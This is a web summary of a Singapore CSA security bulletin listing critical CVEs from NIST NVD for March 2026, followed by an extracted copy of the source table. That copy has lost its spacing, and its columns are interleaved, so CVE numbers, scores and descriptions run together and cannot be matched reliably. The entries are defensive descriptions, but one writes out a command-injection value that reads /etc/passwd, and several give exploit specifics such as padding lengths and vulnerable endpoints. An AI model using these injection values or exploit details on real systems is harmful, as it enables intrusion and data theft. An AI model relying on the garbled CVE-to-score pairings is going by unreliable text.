
CSA Security Bulletin: NIST NVD Vulnerabilities

CSA Alerts & Advisories (Singapore)
Published March 25th, 2026
Detected March 25th, 2026

Summary

The Cyber Security Agency of Singapore (CSA) has issued a security bulletin detailing critical vulnerabilities identified in the past week from the NIST National Vulnerability Database (NVD). The bulletin categorizes vulnerabilities by severity using CVSSv3 scores and provides specific details on several critical CVEs affecting various software and hardware components.

What changed

This security bulletin from the CSA of Singapore summarizes critical vulnerabilities identified from the NIST NVD over the past week. It highlights several CVEs with CVSSv3 base scores of 10.0, affecting products such as Go applications, Firefox, Thunderbird, UniFi Network Application, Azure Cloud Shell, and Mesop. Specific vulnerabilities include remote code execution, sandbox escapes, path traversal, and server-side request forgery, with details on affected versions and potential impacts like lateral movement and device compromise.

Organizations, particularly those using the affected software and hardware, should review the bulletin to assess their exposure. Immediate actions may include applying patches, updating out of the affected version ranges (e.g., Firefox < 149, Thunderbird < 149, and Mesop versions 1.2.2 and below are affected), or, where immediate patching is not possible, applying the listed workarounds such as manually deleting a failing network policy. Failure to address these critical vulnerabilities could lead to significant security breaches, including full device compromise and unauthorized access to sensitive data.

What to do next

  1. Review the bulletin for affected software and hardware in your environment.
  2. Apply available patches or update to fixed versions for the identified vulnerabilities.
  3. Implement the recommended workarounds if immediate patching is not feasible.

Source document (simplified)

SecurityBulletin25March2026

Generatedon25March2026

SingCERT'sSecurityBulletinsummarisesthelistofvulnerabilitiescollatedfromtheNationalInstituteofStandardsandTechnology(NIST)'s NationalVulnerabilityDatabase(NVD)inthepastweek. Thevulnerabilitiesaretabledbasedonseverity,inaccordancetotheirCVSSv3basescores: vulnerabilitieswithabasescoreof9.0toCritical 10.0 vulnerabilitieswithabasescoreof7.0toHigh 8.9 vulnerabilitieswithabasescoreof4.0toMedium 6.9 vulnerabilitieswithabasescoreof0.1toLow 3.9 None vulnerabilitieswithabasescoreof0.0 ForthosevulnerabilitieswithoutassignedCVSSscores,pleasevisitNVDfortheupdatedCVSSvulnerabilityentries.

CRITICALVULNERABILITIES

CVE Base Description ReferenceNumber Score

RomeogivesthecapabilitytoreachhighcodecoverageofGo≥1.20appsbyhelpingtomeasurecode coverageforfunctionalandintegrationtestswithinGitHubActions.Priortoversion0.2.1,duetoamis- writtenNetworkPolicy,amaliciousactorcanpivotfromthe"hardened"namespacetoanyPodoutofit.This CVE-2026-breaksthesecurity-by-defaultpropertyexpectedaspartofthedeploymentprogram,leadingtoapotential 10.0 MoreDetails32737lateralmovement.Removingtheinter-nsNetworkPolicypatchesthevulnerabilityinversion0.2.1.If updatesarenotpossibleinproductionenvironments,manuallydeleteinter-nsandupdateassoonas possible.Givenone'scontext,deletethefailingnetworkpolicythatshouldbeprefixedbyinter-ns-inthe targetnamespace. CVE-2026-AnunauthenticatedremoteattackercanexploitahiddenfunctionintheCLIprompttoescapetherestricted 10.0 MoreDetails3587interface,leadingtofullcompromiseofthedevice. CVE-2026-Sandboxescapeduetouse-after-freeintheDisabilityAccessAPIscomponent.Thisvulnerabilityaffects 10.0 MoreDetails4688Firefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. AmaliciousactorwithaccesstothenetworkcouldexploitaPathTraversalvulnerabilityfoundintheUniFiCVE-2026-NetworkApplicationtoaccessfilesontheunderlyingsystemthatcouldbemanipulatedtoaccessan 10.0 MoreDetails22557underlyingaccount. CVE-2026-Sandboxescapeduetouse-after-freeintheGraphics:Canvas2Dcomponent.Thisvulnerabilityaffects 10.0 MoreDetails4725Firefox<149andThunderbird<149. StepCAisanonlinecertificateauthorityforsecure,automatedcertificatemanagementforDevOps.CVE-2026-Versions0.30.0-rc6andbelowdonotsafeguardagainstunauthenticatedcertificateissuancethroughthe 10.0 MoreDetails30836SCEPUpdateReq.Thisissuehasbeenfixedinversion0.30.0. 
WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,multiplevulnerabilities inAVideo'sCloneSitepluginchaintogethertoallowacompletelyunauthenticatedattackertoachieve remotecodeexecution.Theclones.json.phpendpointexposesclonesecretkeyswithoutauthentication, CVE-2026-whichcanbeusedtotriggerafulldatabasedumpviacloneServer.json.php.Thedumpcontainsadmin 10.0 MoreDetails33478passwordhashesstoredasMD5,whicharetriviallycrackable.Withadminaccess,theattackerexploitsan OScommandinjectioninthersynccommandconstructionincloneClient.json.phptoexecutearbitrary systemcommands.Commitc85d076375fab095a14170df7ddb27058134d38ccontainsapatch. CVE-2026-Server-siderequestforgery(ssrf)inAzureCloudShellallowsanunauthorizedattackertoelevateprivileges 10.0 MoreDetails32169overanetwork. MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Versions1.2.2andbelow

containaPathTraversalvulnerabilitythatallowsanyusersupplyinganuntrustedstatetokenthroughthe UIstreampayloadtoarbitrarilytargetfilesonthediskunderthestandardfile-basedruntimebackend.ThisCVE-2026- 10.0 MoreDetailscanresultinapplicationdenialofservice(viacrashloopswhenreadingnon-msgpacktargetfilesas33054configurations),orarbitraryfilemanipulation.Thisvulnerabilityheavilyexposessystemshostedutilizing FileStateSessionBackend.Unauthorizedmaliciousactorscouldinteractwitharbitrarypayloadsoverwriting orexplicitlyremovingunderlyingserviceresourcesnativelyoutsidetheapplicationbounds.Thisissuehas beenfixedinversion1.2.3. OpenClawversionspriorto2026.3.12containanauthorizationbypassvulnerabilityintheWebSocket CVE-2026-connectpaththatallowsshared-tokenorpassword-authenticatedconnectionstoself-declareelevated 9.9 MoreDetails22172scopeswithoutserver-sidebinding.Attackerscanexploitthislogicflawtopresentunauthorizedscopessuch asoperator.adminandperformadmin-onlygatewayoperations. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,the /api/lute/html2BlockDOMonthedesktopcopieslocalfilespointedtobyfile://linksinpastedHTMLintothe CVE-2026-workspaceassetsdirectorywithoutvalidatingpathsagainstasensitive-pathlist.TogetherwithGET 9.9 MoreDetails32938/assets/*path,whichonlyrequiresauthentication,apublish-servicevisitorcancausethedesktopkernelto copyanyreadablesensitivefileandthenreaditviaGET,leadingtoexfiltrationofsensitivefiles.Thisissue hasbeenfixedinversion3.6.1. 
ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion3.5.3of @apostrophecms/import-export,Theextract()functioningzip.jsconstructsfile-writepathsusing fs.createWriteStream(path.join(exportPath,header.name)).path.join()doesnotresolveorsanitise traversalsegmentssuchas../.Itconcatenatesthemas-is,meaningatarentrynamed../../evil.js CVE-2026-resolvestoapathoutsidetheintendedextractiondirectory.Nocanonical-pathcheckisperformedbefore 9.9 MoreDetails32731thewritestreamisopened.ThisisatextbookZipSlipvulnerability.Anyuserwhohasbeengrantedthe GlobalContentModifypermission—aroleroutinelyassignedtocontenteditorsandsitemanagers—can uploadacrafted.tar.gzfilethroughthestandardCMSimportUIandwriteattacker-controlledcontentto anypaththeNode.jsprocesscanreachonthehostfilesystem.Version3.5.3of@apostrophecms/import- exportfixestheissue. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Versions1.2.0through1.8.1 haveabypassofthepatchforCVE-2025-68478(ExternalControlofFileName),leadingtotheroot architecturalissuewithinLocalStorageServiceremainingunresolved.Becausetheunderlyingstorage CVE-2026-layerlacksboundarycontainmentchecks,thesystemreliesentirelyontheHTTP-layerValidatedFileName 9.9 MoreDetails33309dependency.Thisdefense-in-depthfailureleavesthePOST/api/v2/files/endpointvulnerabletoArbitrary FileWrite.Themultipartuploadfilenamebypassesthepath-parameterguard,allowingauthenticated attackerstowritefilesanywhereonthehostsystem,leadingtoRemoteCodeExecution(RCE).Version1.9.0 containsanupdatedfix. Server-siderequestforgery(ssrf)inMicrosoft365Copilot'sBusinessChatallowsanauthorizedattackertoCVE-2026-elevateprivilegesoveranetwork. 
9.9 MoreDetails26137 CVE-2026-JITmiscompilationintheJavaScriptEngine:JITcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4698ESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfiles withinaspecifieddirectory.Inversions2.61.2andbelow,anyunauthenticatedvisitorcanregisterafull administratoraccountwhenself-registration(signup=true)isenabledandthedefaultuserpermissions haveperm.admin=true.Thesignuphandlerblindlyappliesalldefaultsettings(includingPerm.Admin)to CVE-2026-thenewuserwithoutanyserver-sideguardthatstripsadminfromself-registeredaccounts.The 32760signupHandlerissupposedtocreateunprivilegedaccountsfornewvisitors.Itcontainsnoexplicit user.Perm.Admin=falseresetafterapplyingdefaults.Ifanadministrator(intentionallyoraccidentally) configuresdefaults.perm.admin=trueandalsoenablessignup,everyaccountcreatedviathepublic registrationendpointisanadministratorwithfullcontroloverallfiles,users,andserversettings.Thisissue hasbeenresolvedinversion2.62.0. XerteOnlineToolkitsversions3.14andearliercontainanunauthenticatedarbitraryfileuploadvulnerability inthetemplateimportfunctionalitythatallowsremoteattackerstoexecutearbitrarycodebyuploadinga CVE-2026-craftedZIParchivecontainingmaliciousPHPpayloads.Attackerscanbypassauthenticationchecksinthe 32985import.phpfiletouploadatemplatearchivewithPHPcodeinthemediadirectory,whichgetsextractedtoa web-accessiblepathwherethemaliciousPHPcanbedirectlyaccessedandexecutedunderthewebserver context. 
LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversionspriorto1.9.0,the POST/api/v1/buildpublictmp/{flowid}/flowendpointallowsbuildingpublicflowswithoutrequiring authentication.Whentheoptionaldataparameterissupplied,theendpointusesattacker-controlledflow CVE-2026-data(containingarbitraryPythoncodeinnodedefinitions)insteadofthestoredflowdatafromthe 33017database.Thiscodeispassedtoexec()withzerosandboxing,resultinginunauthenticatedremotecode execution.ThisisdistinctfromCVE-2025-3248,whichfixed/api/v1/validate/codebyaddingauthentication. Thebuildpublictmpendpointisdesignedtobeunauthenticated(forpublicflows)butincorrectlyaccepts attacker-suppliedflowdatacontainingarbitraryexecutablecode.Thisissuehasbeenfixedinversion1.9.0.

SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowcontainanauthorization bypassvulnerabilityinthe/api/search/fullTextSearchBlockendpoint.Whenthemethodparameterissetto 2,theendpointpassesuser-suppliedinputdirectlyasarawSQLstatementtotheunderlyingSQLiteCVE-2026-databasewithoutanyauthorizationorread-onlychecks.Thisallowsanyauthenticateduser—including32767thosewiththeReaderrole—toexecutearbitrarySQLstatements(SELECT,DELETE,UPDATE,DROPTABLE, etc.)againsttheapplication'sdatabase.Thisisinconsistentwiththeapplication'sownsecuritymodel:the dedicatedSQLendpoint(/api/query/sql)correctlyrequiresbothCheckAdminRoleandCheckReadonly middleware,butthesearchendpointbypassesthesecontrolsentirely.Thisissuehasbeenfixedinversion 3.6.1. CVE-2026-Use-after-freeintheCSSParsingandComputationcomponent.ThisvulnerabilityaffectsFirefox<149, 4691 CVE-2026-Improperneutralizationofspecialelementsusedinacommand('commandinjection')inMicrosoftBing 32194Imagesallowsanunauthorizedattackertoexecutecodeoveranetwork. VulnerabilityintheOracleIdentityManagerproductofOracleFusionMiddleware(component:REST WebServices)andOracleWebServicesManagerproductofOracleFusionMiddleware(component:Web ServicesSecurity).Supportedversionsthatareaffectedare12.2.1.4.0and14.1.2.1.0.Easilyexploitable CVE-2026-vulnerabilityallowsunauthenticatedattackerwithnetworkaccessviaHTTPtocompromiseOracleIdentity 9.821992ManagerandOracleWebServicesManager.Successfulattacksofthisvulnerabilitycanresultintakeoverof OracleIdentityManagerandOracleWebServicesManager.Note:OracleWebServicesManagerisinstalled withanOracleFusionMiddlewareInfrastructure.CVSS3.1BaseScore9.8(Confidentiality,Integrityand Availabilityimpacts).CVSSVector:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 
CVE-2026-MitigationbypassintheNetworking:HTTPcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4700 PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelow haveaHeap-basedBufferOverflowvulnerabilityintheDNSparser'snamelengthhandler.Thisimpacts applicationsusingPJSIP'sbuilt-inDNSresolver,suchasthoseconfiguredwithpjsuaconfig.nameserveror CVE-2026-UaConfig.nameserverinPJSUA/PJSUA2.ItdoesnotaffectuserswhorelyontheOSresolver(e.g., 32945getaddrinfo())bynotconfiguringanameserver,orthoseusinganexternalresolvervia pjsipresolversetextresolver().Thisissueisfixedinversion2.17.Forusersunabletoupgrade,a workaroundistodisableDNSresolutioninthePJSIPconfig(bysettingnameservercounttozero)ortouse anexternalresolverimplementationinstead. TheAimogenPropluginforWordPressisvulnerabletoArbitraryFunctionCallthatcanleadtoprivilege escalationduetoamissingcapabilitycheckonthe'aiomaticcallaifunctionrealtime'functioninallCVE-2026-versionsupto,andincluding,2.7.5.Thismakesitpossibleforunauthenticatedattackerstocallarbitrary4038WordPressfunctionssuchas'updateoption'toupdatethedefaultroleforregistrationtoadministratorand enableuserregistrationforattackerstogainadministrativeuseraccesstoavulnerablesite. pyOpenSSLisaPythonwrapperaroundtheOpenSSLlibrary.Startinginversion22.0.0andpriortoversion CVE-2026-26.0.0,ifauserprovidedcallbackto`setcookiegeneratecallbackreturnedacookievaluegreaterthan 27459256bytes,pyOpenSSLwouldoverflowanOpenSSLprovidedbuffer.Startinginversion26.0.0,cookievalues thataretoolongarenowrejected. 
MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Inversions1.2.2and below,anexplicitwebendpointinsidetheai/testingmoduleinfrastructuredirectlyingestsuntrustedPython codestringsunconditionallywithoutauthenticationmeasures,yieldingstandardUnrestrictedRemoteCode Execution.AnyindividualcapableofroutingHTTPlogictothisserverblockwillgainexplicithost-machineCVE-2026-commandrights.TheAIcodebasepackageincludesalightweightdebuggingFlaskserverinside33057ai/sandbox/wsgi_app.py.The/exec-pyrouteacceptsbase_64encodedrawstringpayloadsinsidethecode parameternativelyevaluatedbyabasicPOSTwebrequest.Itsavesitrapidlytotheoperatingsystemlogic pathandinjectsitrecursivelyusingexecute_module(module_path...).Thisissuehasbeenfixedinversion 1.2.3. AvulnerabilityhasbeenfoundinTendaA1515.13.07.13.TheimpactedelementisthefunctionUploadCfgCVE-2026-ofthefile/cgi-bin/UploadCfg.ThemanipulationoftheargumentFileleadstostack-basedbufferoverflow.4567Theattackmaybeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. TheWoocommerceCustomProductAddonsPropluginforWordPressisvulnerabletoRemoteCode Executioninallversionsupto,andincluding,5.4.1viathecustompricingformulaeval()inthe process_custom_formula()functionwithinincludes/process/price.php.Thisisduetoinsufficientsanitization CVE-2026-andvalidationofuser-submittedfieldvaluesbeforepassingthemtoPHP'seval()function.The 4001sanitize_values()methodstripsHTMLtagsbutdoesnotescapesinglequotesorpreventPHPcodeinjection. Thismakesitpossibleforunauthenticatedattackerstoexecutearbitrarycodeontheserverbysubmittinga craftedvaluetoaWCPAtextfieldconfiguredwithcustompricingformula(pricingType:"custom"with {this.value}). 
ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#path_fordoesnotvalidatethattheresolvedfilesystem pathremainswithinthestoragerootdirectory.Ifablobkeycontainingpathtraversalsequences(e.g.../`)CVE-2026-

33195 isused,itcouldallowreading,writing,ordeletingarbitraryfilesontheserver.Blobkeysareexpectedtobe trustedstrings,butsomeapplicationscouldbepassinguserinputaskeysandwouldbeaffected.Versions 8.1.2.1,8.0.4.1,and7.2.3.1containapatch. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,anunauthenticatedSQLinjection vulnerabilityexistsinobjects/category.phpinthegetAllCategories()method.ThedoNotShowCats CVE-2026- requestparameterissanitizedonlybystrippingsingle-quotecharacters(str_replace("'",'',...)),butthisis 33352 triviallybypassedusingabackslashescapetechniquetoshiftSQLstringboundaries.Theparameterisnot coveredbyanyoftheapplication'sglobalinputfiltersinobjects/security.php.Version26.0containsa patchfortheissue. AvulnerabilityhasbeenfoundinTiandyEasy7IntegratedManagementPlatformupto7.17.0.This vulnerabilityaffectsunknowncodeofthefile/Easy7/apps/WebService/ImportSystemConfiguration.jspoftheCVE-2026- componentConfigurationHandler.ThemanipulationoftheargumentFileleadstooscommandinjection.4585 Theattackcanbeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused.The

DuetotheimproperneutralisationofspecialelementsusedinanOScommand,anunauthenticatedremoteCVE-2026-attackercanexploitanRCEvulnerabilityinthecommb24sysapimodule,resultinginfullsystem32968compromise.ThisvulnerabilityisavariantattackforCVE-2020-10383. CVE-2026-CWE-20vulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid-ImageMagick7: 4755before7.1.2-11. FreeFloatFTP1.0containsabufferoverflowvulnerabilityintheSTORcommandhandlerthatallowsremote CVE-2019-attackerstoexecutearbitrarycodebysendingacraftedSTORrequestwithanoversizedpayload.Attackers 25614canauthenticatewithanonymouscredentialsandsendamaliciousSTORcommandcontaining247bytesof paddingfollowedbyareturnaddressandshellcodetotriggercodeexecutionontheFTPserver. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityinthematchipv6addresses function,triggeredwhenprocessingPTRqueriesforIPv6reverseDNSdomains(.ip6.arpa)receivedvia multicastDNSonUDPport5353.Duringprocessing,thedomainnamefromnamebufferiscopiedviaCVE-2026-strcpyintoafixed256-bytestackbuffer,andthenthereverseIPv6requestisextractedintoabufferofonly3087246bytes(INET6ADDRSTRLEN).Becausethelengthofthedataisnevervalidatedbeforethisextraction,an attackercansupplyinputlargerthan46bytes,causinganout-of-boundswrite.Thisallowsaspecially craftedDNSquerytooverflowthestackbufferinmatchipv6addresses,potentiallyenablingremotecode execution.Thisissuehasbeenfixedinversions24.10.6and25.12.1. 
MemuPlay6.0.7containsaninsecurefilepermissionsvulnerabilitythatallowslow-privilegeusersto CVE-2019-escalateprivilegesbyreplacingtheMemuService.exeexecutable.Attackerscanrenameandoverwrite 25568MemuService.exeintheinstallationdirectorywithamaliciousexecutable,whichexecuteswithsystem-level privilegeswhentheservicerestartsafteracomputerreboot. DownloadAcceleratorPlusDAP10.0.6.0containsastructuredexceptionhandlerbufferoverflow CVE-2019-vulnerabilitythatallowsremoteattackerstoexecutearbitrarycodebycraftingmaliciousURLs.Attackers 25628cancreatespeciallycraftedURLswithoverflowingbufferdatathatoverwritesSEHpointersandexecutes embeddedshellcodewhenimportedthroughtheapplication'swebpageimportfunctionality. flattedisacircularJSONparser.Priortoversion3.4.2,theparse()functioninflattedcanuseattacker- controlledstringvaluesfromtheparsedJSONasdirectarrayindexkeys,withoutvalidatingthattheyare numeric.SincetheinternalinputbufferisaJavaScriptArray,accessingitwiththekey"proto"returnsCVE-2026-Array.prototypeviatheinheritedgetter.Thisobjectisthentreatedasalegitimateparsedvalueand33228assignedasapropertyoftheoutputobject,effectivelyleakingalivereferencetoArray.prototypetothe consumer.Anycodethatsubsequentlywritestothatpropertywillpollutetheglobalprototype.Thisissue hasbeenpatchedinversion3.4.2. TabsMailCarrier2.5.1containsabufferoverflowvulnerabilityintheMAILFROMSMTPcommandthatallows CVE-2019-remoteattackerstoexecutearbitrarycodebysendingacraftedMAILFROMparameter.Attackerscan 25646connecttotheSMTPserviceonport25andsendamaliciousMAILFROMcommandwithanoversizedbuffer tooverwritetheEIPregisterandexecuteabindshellpayload. 
TheKaliFormspluginforWordPressisvulnerabletoRemoteCodeExecutioninallversionsupto,and including,2.4.9viathe'formprocess'function.Thisisduetothe'preparepostdata'functionmappingCVE-2026-user-suppliedkeysdirectlyintointernalplaceholderstorage,combinedwiththeuseof'calluserfunc'on3584theseplaceholdervalues.Thismakesitpossibleforunauthenticatedattackerstoexecutecodeonthe server. CVE-2024-SysAKv2.0andbeforeisvulnerabletocommandexecutionviaaaa;cat/etc/passwd. 9.8 MoreDetails44722 OpenClawbefore2026.2.24containsasandboxnetworkisolationbypassvulnerabilitythatallowstrusted CVE-2026-operatorstojoinanothercontainer'snetworknamespace.Attackerscanconfigurethedocker.network 32038parameterwithcontainer: valuestoreachservicesintargetcontainernamespacesandbypass

networkhardeningcontrols. CVE-2026-Use-after-freeintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR <115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityintheparsequestionfunction. TheissueistriggeredbyPTRqueriesforreverseDNSdomains(.in-addr.arpaand.ip6.arpa).DNSpackets receivedonUDPport5353areexpandedbydnexpandintoan8096-byteglobalbuffer(namebuffer), CVE-2026-whichisthencopiedviaanunboundedstrcpyintoafixed256-bytestackbufferwhenhandlingTYPEPTR 30871queries.Theoverflowispossiblebecausedn_expandconvertsnon-printableASCIIbytes(e.g.,0x01)into multi-characteroctalrepresentations(e.g.,\001),significantlyinflatingtheexpandednamebeyondthe stackbuffer'scapacity.AcraftedDNSpacketcanexploitthisexpansionbehaviortooverflowthestack buffer,makingthevulnerabilityreachablethroughnormalmulticastDNSpacketprocessing.Thisissuehas beenfixedinversions24.10.6and25.12.1. CVE-2026-vulnerabilityinThimPressBuilderPressallowsPHPLocalFileInclusion.ThisissueaffectsBuilderPress:from27065n/athrough2.0.1. CVE-2026-PrivilegeescalationintheNetmonitorcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4717 CVE-2026-Improperneutralizationofspecialelementsusedinanoscommand('oscommandinjection')inMicrosoft 32191BingImagesallowsanunauthorizedattackertoexecutecodeoveranetwork. CVE-2026-Use-after-freeintheWidget:Cocoacomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR<140.9, 4711Thunderbird<149,andThunderbird<140.9. CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird 4723<149. 
ZimbraCollaborationSuite(ZCS)PostJournalserviceversion8.8.15containsacommandinjection CVE-2025-vulnerabilitythatallowsunauthenticatedattackerstoexecutearbitrarysystemcommandsbyexploiting 71275impropersanitizationoftheRCPTTOparameterviaSMTPinjection.Attackerscaninjectshellexpansion syntaxthroughtheRCPTTOparametertoachieveremotecodeexecutionundertheZimbraservicecontext. AcommandinjectionvulnerabilityexistsinthewebmanagementinterfaceoftheWiFiExtenderWDR201ACVE-2026-(HWV2.1,FWLFMZX28040922V1.02).Theadm.cgiendpointimproperlysanitizesuser-suppliedinput30703providedtoacommand-relatedparameterinthesysCMDfunctionality. TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)implementsabrokenauthentication CVE-2026-mechanisminitswebmanagementinterface.Theloginpagedoesnotproperlyenforcesessionvalidation, 30702allowingattackerstobypassauthenticationbydirectlyaccessingrestrictedwebapplicationendpoints throughforcedbrowsing CVE-2026-AnarbitraryfileuploadvulnerabilityinaaPanelv7.57.0allowsattackerstoexecutearbitrarycodevia 29859uploadingacraftedfile. CVE-2026-UndefinedbehaviorintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4705 IncorrectPrivilegeAssignmentvulnerabilityinRymeraWebCoPtyLtd.WoocommerceWholesaleLeadCVE-2026-CaptureallowsPrivilegeEscalation.ThisissueaffectsWoocommerceWholesaleLeadCapture:fromn/a27542through2.0.3.1. CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortbySQLinjection. 9.8 MoreDetails67830 CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonZuutallowsObjectInjection.Thisissueaffects 60233Zuut:fromn/athrough1.4.2. CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonFinagallowsObjectInjection.Thisissueaffects 60237Finag:fromn/athrough1.5.0. 
TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerableto AuthenticationBypassinallversionsupto,andincluding,4.1.2.ThisisduetothepatientSocialLogin() functionnotverifyingthesocialprovideraccesstokenbeforeauthenticatingauser.Thismakesitpossible forunauthenticatedattackerstologinasanypatientregisteredonthesystembyprovidingonlytheiremailCVE-2026-addressandanarbitraryvaluefortheaccesstoken,bypassingallcredentialverification.Theattackergains2991accesstosensitivemedicalrecords,appointments,prescriptions,andbillinginformation(PII/PHIbreach). Additionally,authenticationcookiesaresetbeforetherolecheck,meaningtheauthcookiesfornon-patient users(includingadministrators)arealsosetintheHTTPresponseheaders,eventhougha403responseis returned. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Thempileup

commandoutputsDNAsequencesthathavebeenalignedagainstaknownreference.Oneachoutputlineit writesthereferenceposition,optionallythereferenceDNAbaseatthatposition(obtainedfromaseparate file)andalloftheDNAbasesthatalignedtothatposition.Astheoutputisorderedbyposition,referenceCVE-2026- datathatisnolongerneededisdiscardedonceithasbeenprintedout.Undercertainconditionsthedata31972 couldbediscardedtooearly,leadingtoanattempttoreadfromapointertofreedmemory.Thisbugmay allowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughanattempt toaccessinvalidmemory.Thisbugisfixedinversions1.21.1and1.22.Thereisnoworkaroundforthis issue. CVE-2026-JITmiscompilationintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4702 XML::Parserversionsthrough2.47forPerlhasanoff-by-oneheapbufferoverflowinstserialstack.Inthe CVE-2006-case(stackptr==stacksize-1),thestackwillNOTbeexpanded.Thenthenewvaluewillbewrittenat 10003location(++stackptr),whichequalsstacksizeandthereforefallsjustoutsidetheallocatedbuffer.Thebug canbeobservedwhenparsinganXMLfilewithverydeepelementnesting CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortDirectionSQLinjection. 9.8 MoreDetails67829 CVE-2025-ncursesv6.5andv6.4arevulnerabletoBufferOverflowinprogs/infocmp.c,functionanalyzestring(). 
9.8 MoreDetails69720 CVE-2026-Anissueinwgcloudv.2.3.7andbeforeallowsaremoteattackertoexecutearbitrarycodeviathetest 30402connectionfunction OPEXUSeComplaintandeCASEbeforeversion10.1.0.0includethesecretverificationcodeintheHTTP CVE-2026-responsewhenrequestingapasswordresetvia'ForcePasswordReset.aspx'.Anattackerwhoknowsan 32865existinguser'semailaddresscanresettheuser'spasswordandsecurityquestions.Existingsecurity questionsarenotaskedduringtheprocess. Useofahard-codedAES-256-CBCkeyintheconfigurationbackup/restoreimplementationofSmallCell CVE-2025-SercommSCE4255W(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremote 67112authenticateduserstodecrypt,modify,andre-encryptdeviceconfigurations,enablingcredential manipulationandprivilegeescalationviatheGUIimport/exportfunctions. OScommandinjectionintheCWMPclient(/ftl/bin/cwmp)ofSmallCellSercommSCE4255W(FreedomFi CVE-2025-Englewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerscontrollingtheACSendpoint 67113toexecutearbitrarycommandsasrootviaacraftedTR-069DownloadURLthatispassedunescapedinto thefirmwareupgradepipeline. CVE-2026-DeserializationofUntrustedDatavulnerabilityinShinethemeTravelerallowsObjectInjection.Thisissue 25449affectsTraveler:fromn/abefore3.2.8.1. Useofadeterministiccredentialgenerationalgorithmin/ftl/bin/calcf2inSmallCellSercommSCE4255W CVE-2025-(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerstoderivevalid 67114administrative/rootcredentialsfromthedevice'sMACaddress,enablingauthenticationbypassandfull deviceaccess. 
CVE-2026-AnissueinDedeCMSv.5.7.118andbeforeallowsaremoteattackertoexecutearbitrarycodeviathe 30694array_filtercomponent CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4701 OmniGen2-RLcontainsanunauthenticatedremotecodeexecutionvulnerabilityintherewardserver CVE-2026-componentthatallowsremoteattackerstoexecutearbitrarycommandsbysendingmaliciousHTTPPOST 25873requests.Attackerscanexploitinsecurepickledeserializationofrequestbodiestoachievecodeexecution onthehostsystemrunningtheexposedservice. jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontroloftheoptions argumentoftheoutputfunctionallowsattackerstoinjectarbitraryHTML(suchasscripts)intothe browsercontextthecreatedPDFisopenedin.Thevulnerabilitycanbeexploitedinthefollowingscenario: theattackerprovidesvaluesfortheoutputoptions,forexampleviaawebinterface.ThesevaluesarethenCVE-2026-passedunsanitized(automaticallyorsemi-automatically)totheattackvictim.Thevictimcreatesandopens 9.6 MoreDetails31938aPDFwiththeattackvectorusingoneofthevulnerablemethodoverloadsinsidetheirbrowser.The attackercanthusinjectscriptsthatruninthevictimsbrowsercontextandcanextractormodifysecrets fromthiscontext.Thevulnerabilityhasbeenfixedinjspdf@4.2.1.Asaworkaround,sanitizeuserinput beforepassingittotheoutputmethod. 
TektonPipelinesprojectprovidesk8s-styleresourcesfordeclaringCI/CD-stylepipelines.Startinginversion 1.0.0andpriortoversions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2,theTektonPipelinesgitresolveris vulnerabletopathtraversalviathepathInRepoparameter.AtenantwithpermissiontocreateCVE-2026-ResolutionRequests(e.g.bycreatingTaskRunsorPipelineRunsthatusethegitresolver)canread 9.6 MoreDetails33211arbitraryfilesfromtheresolverpod'sfilesystem,includingServiceAccounttokens.Thefilecontentsare returnedbase64-encodedinresolutionrequest.status.data.Versions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2
